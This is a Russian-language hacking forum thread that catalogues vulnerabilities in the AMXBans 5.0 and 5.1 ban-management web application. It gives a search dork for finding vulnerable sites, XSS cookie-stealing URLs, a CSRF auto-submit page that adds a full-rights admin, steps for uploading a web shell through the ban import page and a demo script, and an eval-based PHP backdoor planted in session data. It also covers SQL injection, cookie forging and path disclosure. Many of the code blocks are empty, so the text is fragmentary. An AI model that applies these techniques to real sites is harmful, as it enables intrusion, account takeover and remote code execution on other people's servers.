![]() |
Обзор AMXBans
AMXBans 5.0 by YoMama/LuX & lantz69
Site: http://www.amxbans.net/ Dork: allinurl:ban_list.php amxbans Папки доступные на запись: include (скрипт сам создает конфиг, который располагается в этой папке) smarty/templates_c (скомпиленные шаблоны смарти) tmp (здесь сохраняются залитые на сервак списки банов) XSS /unavailable.php?message=%3Cscript%3Ealert(document .cookie)%3C/script%3E Необходимо: register_globals = On PHP код:
XSS (активная) /login.php?uid=%3Cscript%3Ealert(/xss/)%3C/script%3E /admin/log_search.php Необходимо: register_globals = On PHP код:
В начала файла include/functions.lang.php дописать PHP код:
Практически в каждом файле: PHP код:
Код:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /Library/WebServer/test/amxbans/ban_list.php on line 46В каждом скрипте перед session_start поставить оператор подавления ошибок @ CSRF Добавляет нового веб-админа с максимальными полномочиями. "Демо" сплойт: Код:
<body onload="document.forms.admins.submit()">Добавить следующий код, например в include/accesscontrol.inc.php PHP код:
/admin/import_bans.php Имя файла для заливки должно заканчиваться на .cfg, и его размер не должен привышать 45000 байт. Загружать шелл надо указав тип файла "text/plain". Шелл зальется в папку tmp с тем же именем. Пример: Код:
$nc localhost 80Таблицы: amx_admins_servers amx_amxadmins amx_banhistory amx_banreasons amx_bans amx_levels amx_logs amx_serverinfo amx_webadmins (id, username, password, level, logcode) //password = md5 хеш Cookies: Ставится 1 кука с именем amxbans. Ее содержимое: oRb%3Ad8578edf8458ce06fbc5bb76a58c5ca4%3A1%3A%3Ac2 b6a0f098280fc8f4795e33b58a77ed%3Ayes%3Ayes%3Ayes%3 Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ayes%3Ay es%3Ayes%3Ayes PHP код:
Получим: Код:
lang|s:19:"<? eval($_GET[c])?>";uid|s:4:"test";pwd|s:32:"098f6bcd4621d373cade4e832627b4f6";uip|s:0:"";lvl|s:1:"1";userid|N;bans_add|s:3:"yes";bans_edit|s:2:"no";bans_delete|s:2:"no";bans_unban|s:2:"no";bans_import|s:2:"no";bans_export|s:2:"no";amxadmins_view|s:2:"no";amxadmins_edit|s:2:"no";webadmins_view|s:2:"no";webadmins_edit|s:2:"no";permissions_edit|s:2:"no";prune_db|s:2:"no";servers_edit|s:2:"no";ip_view|N; |
Обзор AMXBans (часть 2)
Итак проект AMXBans ожил и 15 марта была зарелизена новая версия (5.1). Для тех кто не в курсе: AMXBans - это очень популярная система управления банами и админами на серверах CS 1.6. В новой версии не исправили старых багов, лишь добавили новых.
XSS (register_globals=on) PHP код:
XSS (так же актуально для предыдущей версии) PHP код:
Path disclosure PHP код:
или измененное значение сессии. SQL-injection PHP код:
SQL-injection (register_globals=on) PHP код:
Blind SQL-injection exploit Скуль присутствует в ban_details.php и ban_details_ex.php, только ее необходимость многие могли бы поставить под сомнение, тк выше уже была описана инъекция с выводом. Но если File_priv = y, тогда можно залить шелл. Разработчики добавили возможность комментировать баны, и чтобы банлист не спамили, они прикрутили каптчу. Вот только реализовали они ее хреново: PHP код:
PHP код:
PHP код:
ps2: если не удастся найти пароль по хешу, можно составить куку. ps3: шелл прекрасно льется через /admin/demo.php |
кстати, в AMXBans 5.0 by YoMama/LuX & lantz69 тоже есть раскрытие путей. только что ковырял сайт и наткнулся.
Path disclosure Код:
/ban_details.php?bhid=-1 |
Цитата:
|
| Время: 07:09 |